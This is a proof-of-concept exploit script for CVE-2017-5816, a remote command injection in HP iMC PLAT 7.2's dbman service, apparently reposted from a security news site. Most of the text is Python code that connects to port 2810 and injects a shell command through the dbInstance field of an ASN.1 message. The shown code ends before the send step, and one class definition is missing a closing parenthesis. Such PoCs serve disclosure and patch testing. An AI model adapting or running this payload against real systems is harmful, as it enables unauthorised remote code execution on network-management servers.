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HP iMC Plat 7.2 - Remote Code Execution
来源:@lynerc 作者:Lyne 发布时间:2017-12-04  


# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE
# Date: 11-29-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5816
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-340/

# note that this PoC will create a file 'C:\10008.txt'

from pyasn1.type.univ import *
from pyasn1.type.namedtype import *
from pyasn1.codec.ber import encoder
import struct
import binascii
import socket, sys

ip = ''
port = 2810
payload = "whoami > C:\\10008.txt"
opcode = 10008

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))

class DbmanMsg(Sequence):
    componentType = NamedTypes(
        NamedType('dbIp', OctetString()),
        NamedType('iDBType', Integer()),
        NamedType('dbInstance', OctetString()),
        NamedType('dbSaUserName', OctetString()),
        NamedType('dbSaPassword', OctetString()),
        NamedType('strOraDbIns', OctetString())

msg = DbmanMsg()

msg['dbIp'] = ip
msg['iDBType'] = 4
msg['dbInstance'] = "a\"& " + payload + " &"
msg['dbSaUserName'] = "b"
msg['dbSaPassword'] = "c"
msg['strOraDbIns'] = "d"

encodedMsg = encoder.encode(msg, defMode=True)
msgLen = len(encodedMsg)
values = (opcode, msgLen, encodedMsg)
s = struct.Struct(">ii%ds" % msgLen)
packed_data = s.pack(*values)


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